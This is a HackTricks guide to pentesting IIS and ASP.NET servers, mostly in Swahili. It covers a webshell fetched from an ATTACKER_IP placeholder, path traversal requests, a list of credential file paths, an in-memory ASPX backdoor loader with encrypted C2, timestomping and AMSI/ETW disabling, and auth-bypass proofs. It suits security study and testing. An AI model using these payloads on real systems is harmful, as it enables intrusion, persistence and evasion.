HackTricks
IIS - Internet Information Services
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Nyongeza za faili zinazotekelezwa za majaribio:
- asp
- aspx
- config
- php
Webroot inayoweza kuandikwa → shell ya amri ya ASPX
Ikiwa mtumiaji/grupu mwenye ruhusa ndogo ana ufikiaji wa kuandika kwa C:\inetpub\wwwroot, unaweza kupeleka ASPX webshell na kutekeleza amri za OS kwa niasa ya kitambulisho cha application pool (mara nyingi kikiwa na SeImpersonatePrivilege).
- Thibitisha ACLs:
icacls C:\inetpub\wwwrootorcacls .ukitafuta(F)kwenye mtumiaji/grupu yako. - Pandisha webshell ya amri (kwa mfano, fuzzdb/tennc
cmd.aspx) kwa kutumia PowerShell:
iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx
- Omba
/shell.aspxna endesha amri; utambulisho kwa kawaida unaonyeshaiis apppool\defaultapppool. - Unganisha na Potato-family LPE (kwa mfano, GodPotato/SigmaPotato) wakati AppPool token ina SeImpersonatePrivilege ili pivot kwenda SYSTEM.
Ufichuzi wa Anwani ya IP ya Ndani
Kwenye server yoyote ya IIS ambapo unapata 302 unaweza kujaribu kuondoa Host header na kutumia HTTP/1.0; ndani ya response, Location header inaweza kukuonyesha anwani ya IP ya ndani:
nc -v domain.com 80
openssl s_client -connect domain.com:443
Jibu linalofichua IP ya ndani:
GET / HTTP/1.0
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
Endesha .config files
You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: Download example here
More information and techniques to exploit this vulnerability here
IIS Discovery Bruteforce
Pakua orodha niliyotengeneza:
Ilitengenezwa kwa kuunganisha maudhui ya orodha zifuatazo:
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt
Tumiie bila kuongeza extension yoyote; mafaili yanayohitaji tayari yanaextension.
Path Traversal
Leaking source code
Angalia maelezo kamili katika: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html
Tip
Kwa muhtasari, kuna web.config files kadhaa ndani ya folda za application zenye marejeo kwa faili za “assemblyIdentity” na “namespaces”. Kwa habari hii inawezekana kujua mahali executables zipo na kupakua.
Kutokana na Dlls zilizopakuliwa pia inawezekana kupata namespaces mpya ambapo unapaswa kujaribu kufikia na kupata web.config ili kupata namespaces mpya na assemblyIdentity.
Pia, mafaili connectionstrings.config na global.asax yanaweza kuwa na taarifa za kuvutia.
Katika .Net MVC applications, faili ya web.config ina jukumu muhimu kwa kubainisha kila binary file ambayo application inategemea kupitia “assemblyIdentity” XML tags.
Kuchunguza Mafaili ya Binary
Mfano wa kufikia faili ya web.config umeonyeshwa hapa chini:
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
Ombi hili linafunua mipangilio na utegemezi mbalimbali, kama vile:
- EntityFramework version
- AppSettings kwa kurasa za wavuti, uthibitishaji wa mteja, na JavaScript
- System.web configurations kwa ajili ya uthibitishaji na runtime
- System.webServer modules settings
- Runtime assembly bindings kwa maktaba nyingi kama Microsoft.Owin, Newtonsoft.Json, na System.Web.Mvc
Mipangilio hii inaonyesha kuwa baadhi ya faili, kama /bin/WebGrease.dll, ziko ndani ya folda /bin ya programu.
Root Directory Files
Faili zinazopatikana katika kabrasha la mzizi, kama /global.asax na /connectionstrings.config (ambazo zina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa programu.
Namespaces and Web.Config
Programu za MVC pia hufafanua web.config files za ziada kwa namespaces maalum ili kuepuka matangazo yanayorudiwa katika kila faili, kama inavyoonyeshwa na ombi la kupakua web.config nyingine:
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
Kupakua DLLs
Kumtaja namespace maalum kunadhihirisha uwepo wa DLL iitwayo WebApplication1 katika saraka /bin. Kufuatia hayo, ombi la kupakua WebApplication1.dll linaonyeshwa:
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
Hii inaashiria uwepo wa DLL nyingine muhimu, kama System.Web.Mvc.dll na System.Web.Optimization.dll, katika saraka ya /bin.
Katika tukio ambapo DLL inaleta namespace iitwayo WebApplication1.Areas.Minded, mshambuliaji anaweza kubaini uwepo wa faili nyingine za web.config katika njia zinazoweza kutabiriwa, kama /area-name/Views/, zenye konfigurisho maalum na rejea kwa DLL nyingine kwenye saraka ya /bin. Kwa mfano, ombi la /Minded/Views/web.config linaweza kufichua konfigurisho na namespaces zinazoonyesha uwepo wa DLL nyingine, WebApplication1.AdditionalFeatures.dll.
Faili za kawaida
Kutoka here
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
HTTPAPI 2.0 404 Error
If you see an error like the following one:
 (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png)
Hii ina maana seva haikupokea jina sahihi la domain ndani ya Host header.
Ili kupata ukurasa wa wavuti unaweza kuangalia SSL Certificate inayotolewa na labda utaweza kupata jina la domain/subdomain hapo. Ikiwa halipo unaweza kuhitaji brute force VHosts mpaka upate ile sahihi.
Fungua (decrypt) configuration iliyofichwa na ASP.NET Core Data Protection key rings
Mifumo miwili ya kawaida ya kulinda siri kwenye IIS-hosted .NET apps ni:
- ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) kwa sehemu za web.config kama
. - ASP.NET Core Data Protection key ring (persisted locally) inayotumika kulinda application secrets na cookies.
Ikiwa una ufikiaji wa filesystem au ufikiaji wa interactive kwenye web server, keys zilizohifadhiwa pamoja mara nyingi zinaweza kuruhusu decryption.
- ASP.NET (Full Framework) – decrypt protected config sections with aspnet_regiis:
# Decrypt a section by app path (site configured in IIS)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication"
# Or specify the physical path (-pef/-pdf write/read to a config file under a dir)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication"
- ASP.NET Core – angalia Data Protection key rings zinazo hifadhiwa paikani (XML/JSON files) katika maeneo kama:
- %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys
- HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry)
- App-managed folder (e.g., App_Data\keys or a Keys directory next to the app)
Ikiwa key ring inapatikana, operator anayekimbia kwa utambulisho wa app anaweza kuanzisha IDataProtector kwa madhumuni yanayofanana na kufungua secrets zilizohifadhiwa. Misconfigurations zinazohifadhi key ring pamoja na faili za app zinafanya offline decryption kuwa rahisi mara mwenyeji akifadilika.
IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)
The Phantom Taurus/NET-STAR toolkit inaonyesha muundo uliokomaa kwa fileless IIS persistence na post‑exploitation yote ndani ya w3wp.exe. Mawazo ya msingi yanaweza kutumika tena kwa tradecraft iliyobinafsishwa na kwa detection/hunting.
Key building blocks
- ASPX bootstrapper hosting an embedded payload: ukurasa mmoja .aspx (e.g., OutlookEN.aspx) unaweka Base64‑encoded, optionally Gzip‑compressed .NET DLL. Baada ya trigger request huideteka, ifinywaji (decompress) na ichomewe kwa reflection ndani ya current AppDomain na kuita entry point kuu (e.g., ServerRun.Run()).
- Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results zimefungwa kwa Gzip → AES‑ECB/PKCS7 → Base64 na kusogezwa kupitia seemingly legitimate cookie‑heavy requests; operators walitumia stable delimiters (e.g., “STAR”) kwa chunking.
- Reflective .NET execution: inakubali arbitrary managed assemblies kama Base64, load via Assembly.Load(byte[]) na kupitisha operator args kwa kubadilisha modules haraka bila kugusa disk.
- Operating in precompiled ASP.NET sites: ongeza/simamia auxiliary shells/backdoors hata wakati site imeprecompiled (e.g., dropper adds dynamic pages/handlers au inategemea config handlers) – inafichuliwa na commands kama bypassPrecompiledApp, addshell, listshell, removeshell.
- Timestomping/metadata forgery: expose action changeLastModified na timestomp wakati wa deployment (ikiwa ni pamoja na future compilation timestamps) ili kuwekeza DFIR.
- Optional AMSI/ETW pre‑disable for loaders: loader ya hatua ya pili inaweza kuzima AMSI na ETW kabla ya kuita Assembly.Load ili kupunguza uchunguzi wa payloads zilizo katika memory.
Minimal ASPX loader pattern
<%@ Page Language="C#" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
// 1) Obtain payload bytes (hard‑coded blob or from request)
string b64 = /* hardcoded or Request["d"] */;
byte[] blob = Convert.FromBase64String(b64);
// optional: decrypt here if AES is used
using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
using(var ms = new MemoryStream()){
gz.CopyTo(ms);
var asm = Assembly.Load(ms.ToArray());
// 2) Invoke the managed entry point (e.g., ServerRun.Run)
var t = asm.GetType("ServerRun");
var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
object inst = m.IsStatic ? null : Activator.CreateInstance(t);
m.Invoke(inst, new object[]{ HttpContext.Current });
}
}
}
</script>
Ufungaji/wasaidizi wa crypto (Gzip + AES‑ECB + Base64)
using System.Security.Cryptography;
static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
using(var aes = Aes.Create()){
aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
return t.TransformFinalBlock(data, 0, data.Length);
}
}
static string Pack(object obj, byte[] key){
// serialize → gzip → AES‑ECB → Base64
byte[] raw = Serialize(obj); // your TLV/JSON/msgpack
using var ms = new MemoryStream();
using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
byte[] enc = AesEcb(ms.ToArray(), key, true);
return Convert.ToBase64String(enc);
}
static T Unpack<T>(string b64, byte[] key){
byte[] enc = Convert.FromBase64String(b64);
byte[] cmp = AesEcb(enc, key, false);
using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
using var outMs = new MemoryStream(); gz.CopyTo(outMs);
return Deserialize<T>(outMs.ToArray());
}
Cookie/session flow and command surface
- Uanzishaji wa session na tasking hufanywa kupitia cookies ili kujumuika na shughuli za kawaida za wavuti.
- Amri zilizotambulika katika mazingira ya kweli zilijumuisha: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; na dynamic execution primitives code_self, code_pid, run_code kwa ajili ya in‑memory .NET execution.
Zana ya Timestomping
File.SetCreationTime(path, ts);
File.SetLastWriteTime(path, ts);
File.SetLastAccessTime(path, ts);
Kuzima AMSI/ETW inline kabla ya Assembly.Load (loader variant)
// Patch amsi!AmsiScanBuffer to return E_INVALIDARG
// and ntdll!EtwEventWrite to a stub; then load operator assembly
DisableAmsi();
DisableEtw();
Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });
Angalia AMSI/ETW bypass techniques katika: windows-hardening/av-bypass.md
Vidokezo vya uwindaji (watetezi)
- Ukurasa mmoja wa ASPX usio wa kawaida wenye blobs ndefu za Base64/Gzip; maombi ya POST yenye cookie nyingi.
- Managed modules zisizo na backing ndani ya w3wp.exe; strings kama Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
- Vigawanyaji vinarudiwa kama “STAR” kwenye trafiki; timestamps zisizolingana au hata za baadaye kwenye ASPX/assemblies.
Telerik UI WebResource.axd unsafe reflection (CVE-2025-3600)
Programu nyingi za ASP.NET zinajumuisha Telerik UI for ASP.NET AJAX na zinaonyesha handler isiyothibitishwa Telerik.Web.UI.WebResource.axd. Wakati endpoint ya cache ya Image Editor inafikika (type=iec), vigezo dkey=1 na prtype vinaweza kuwezesha unsafe reflection inayoendesha constructor yoyote ya umma isiyo na parameter kabla ya uthibitisho. Hii inatoa primitive ya DoS inayofaa kwa ujumla na inaweza kupanuka hadi pre‑auth RCE kwenye apps zenye AppDomain.AssemblyResolve handlers zisizo salama.
Tazama mbinu za kina na PoCs hapa:
Telerik Ui Aspnet Ajax Unsafe Reflection Webresource Axd
Old IIS vulnerabilities worth looking for
Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure
Unaweza kujaribu kuorodhesha folders na files ndani ya kila folder uliogundua (hata ikiwa inahitaji Basic Authentication) kwa kutumia technique hii.
Kizuizi kikuu cha technique hii ikiwa server iko vunjwa ni kwamba inaweza tu kupata hadi herufi 6 za kwanza za jina la kila file/folder na herufi 3 za kwanza za extension za files.
Unaweza kutumia https://github.com/irsdl/IIS-ShortName-Scanner kujaribu udhaifu huu:java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
.png)
Utafiti wa awali: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
Unaweza pia kutumia metasploit: use scanner/http/iis_shortname_scanner
Wazo zuri la kutafuta jina la mwisho la files zilizogunduliwa ni kuomba LLMs kwa chaguzi kama ilivyofanywa katika script https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py
Basic Authentication bypass
Bypass basic authentication (IIS 7.5) kwa kujaribu kufikia: /admin:$i30:$INDEX_ALLOCATION/admin.php au /admin::$INDEX_ALLOCATION/admin.php
Unaweza kujaribu kuchanganya udhaifu huu na ule wa mwisho kupata folda mpya na bypass uthibitisho.
ASP.NET Trace.AXD enabled debugging
ASP.NET ina mode ya debugging na faili yake inaitwa trace.axd.
Inahifadhi log ya kina sana ya ombi zote zilizofanywa kwa application kwa kipindi cha wakati.
Taarifa hizi zinajumuisha IP za wateja wa mbali, session IDs, cookies zote za request na response, physical paths, taarifa za source code, na pengine hata majina ya watumiaji na nywila.
https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/
ASPXAUTH Cookie
ASPXAUTH inatumia taarifa zifuatazo:
validationKey(string): ufunguo uliosimbwa kwa hex wa kutumia kwa uthibitisho wa saini.decryptionMethod(string): (default “AES”).decryptionIV(string): initialization vector iliyosimbwa kwa hex (defaults kuwa vector ya zeros).decryptionKey(string): ufunguo uliosimbwa kwa hex wa kutumia kwa decryption.
Hata hivyo, baadhi ya watu watatumia default values za vigezo hivi na watatumia kama cookie barua pepe ya mtumiaji. Kwa hiyo, ikiwa unaweza kupata tovuti inayotumia same platform inayotumia cookie ya ASPXAUTH na uka unda mtumiaji mwenye barua pepe ya mtumiaji unayetaka kujifanya kwenye server inayoshambuliwa, unaweza kuwa na uwezo wa kutumia cookie kutoka server ya pili kwenye ile ya kwanza na kujifanya mtumiaji huyo.
Shambulio hili lilifanikiwa katika writeup.
IIS Authentication Bypass with cached passwords (CVE-2022-30209)
Full report here: Hitilafu katika code haikuangalia ipasavyo nywila iliyotolewa na mtumiaji, kwa hiyo mshambuliaji ambaye password hash yake inagonga key ambayo tayari iko kwenye cache ataweza kuingia kama mtumiaji huyo.
# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j
assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')
# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized
# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
Marejeo
- 0xdf – HTB Job (IIS write → ASPX shell → GodPotato)
- Unit 42 – Phantom Taurus: APT mpya ya Nexus ya China na ugunduzi wa NET-STAR Malware Suite
- Misingi ya AMSI/ETW bypass (HackTricks)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.